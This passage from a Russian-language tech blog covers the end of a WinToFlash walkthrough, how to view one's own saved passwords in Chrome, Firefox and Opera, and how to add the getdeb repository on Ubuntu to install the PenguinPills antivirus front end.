от вашей флэшки

Нажмите Выход и все! Для Windows XP, 2003, Vista, 2008 и 7 мастер
в WinToFlash един.

При возникновении проблем приходит на выручку расширенный режим.
Чаще всего помогает смена файловой системы.

WinToFlash поддерживает сохранение и загрузку профилей

Решения многих проблем можно найти на сайте, а попасть на него
прямо из программы

Параметры, которые можно еще настроить. Не мало, согласитесь.

Вот и все

Как увидеть текст под звездочками

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

Бывают такие случаи, когда надо ввести свой пароль, чтобы зайти на свою страницу, например, с другого компьютера. Или хотите поменять свой пароль на новый, а старый не помните, так как сохранили пароль в браузере, нажав на кнопку - "Запомнить пароль". Отображается пароль только звездочками, а нам нужен текст.

В Google Chrome

Жмем вверху справа на три полосочки (Настройка и управление). Выбираем "Настройки". Спускаемся в самый низ страницы, жмем на "Показать дополнительные настройки". В разделе "Пароли и формы" кликаем на "Управление сохраненными паролями". Появится окно, где находим нужный сайт, кликаем по нему. Появится окошко с надписью "Показать". Жмем на "Показать" и нужный пароль можно увидеть уже без звездочек.

В Mozilla Firefox

Вверху жмем на "Инструменты", далее на "Настройки", выбираем вкладку "Защита". Жмем на кнопку "Сохраненные пароли". Дальше на кнопку "Отобразить пароли". Подтверждаем запрос кликнув на "Да". Всё! Все пароли отобразятся текстом!

В Opera

Жмем на "Инструменты" на верхней панели страницы. Там заходим на "общие настройки" (или сразу кнопками Ctrl+F12), жмем на вкладку "формы". Там увидите кнопку "Пароли", кликнув на которую вы увидите все сайты, на которых с данного компьютера сохранялись пароли. Если вы поставите галочку в пункте "включить управление паролями", вам не надо будет каждый раз набирать свой пароль, даже если, к примеру, вы завели несколько дневников на Лиру. Нажмите на значок с ключом и поля авторизации заполнятся автоматически.

17 дек. 2013 г.

Продлжение Антивирус для Ubuntu

Друзья огромня просба, если статья вам помогла кликните на рекламный банер... Зарание спасибо

В продолжение статьи Анитвирус для Ubuntu:

Была у меня мысль расписать синтаксис работы через командную строку приложения AGV-Free.
Проанализировав его решил что продвинутый пользователь и так с ним легко разберется, а простому пользовотелю, нужен графический интерфейс.

Покопавшись в просторах гугла нашел интересное приложение PenguinPills.

PenguinPills - это один графический интерфейс, содержащий антивирусы для Linux (страница с антивирусами), в количестве аж тринадцати различных, самых популярных продуктов.

При попытки установить  PenguinPills, возникло некоторое количество проблем.

1. В репозиториях Ubuntu этого приложения нет.

2. При заходе на сайт http://www.getdeb.net/, нажимаем Install Now, всплывает окошко, которое спрашивает чем открыть, выбераем центр приложений Ubuntu, и ошибка))))
Погуглив проблему наткнулся на следующие решение:

Добавляем источник, открываем «Менеджер обновлений», выбрав нужный пункт из меню пользователя.
Меню пользователя в Ubuntu
  Далее в левом нижнем углу → «Настройки» → «Другое ПО» → «Добавить», копируем и вставляем в строку это:
deb http://archive.getdeb.net/ubuntu oneiric-getdeb apps
  Нажимаем «Добавить источник» и выходим из менеджера обновлений. Открываем терминал и вбиваем (лучше скопировать и вставить):
// Добавляем ключ.
wget -q -O- http://archive.getdeb.net/getdeb-archive.key | sudo apt-key add -
// Проверяем обновления.
sudo apt-get update
// Обновляем систему.
sudo apt-get upgrade
  Теперь заходим по этой сслыке и скачиваем пакет «GetDeb» (ссылка с официального сайта):  http://archive.getdeb.net/

  Устанавливаем этот пакет обычным способом, кликнув по нему. Все, теперь можно вернуться на сайт c PenguinPills«PenguinPills» и снова кликнуть на кнопочку «Install this now».

У меня не получилось через FireFox, открыв через Chrom. Все устаовка запустилась без проблем.

Все после установки

мы видим:




Верхняя строчка.
Сканер - здесь мы выбираем чем будем сканировать, каким Антивирусом.
Надо понимать, что использование того или иного Антивируса возможно только при его предварительной установке.  У нас установлен AVG.

галочки Run scan as root и Ran update us root, устанавливают сканирование и обновление от имени  root;
Scanner Path: Расположение программы антивируса, кнопочка scan - проверяет наличие усановки программы;
Options - там мы выстовляем параметры сканирования, и путь куда будут писаться логи;
Updater Path: это раздел для обновления антивируса, конпка update обновляетя вирусные базы и сигнатуры;








Targets: список проверяемых папок;
Add folder и Add files - добовляем папки и файлы для антивирусной проверки;
Remove - удаление папок и файлов из спска проверок;

Черная строка и и entor - работа через кнсоль;

Settings - настройки;
save - сохранение настроек;

Restore - востоновление настроек;
Start Scan - запуск проверки.
Quit - выход.

Вот и все...

Будут вопросы пишите m.amenitskiy@gmail.com.

При написании данной стать использовались следующие ресурсы:
1.http://www.linux-info.ru/
2.http://sourceforge.net/
3.http://zenway.ru/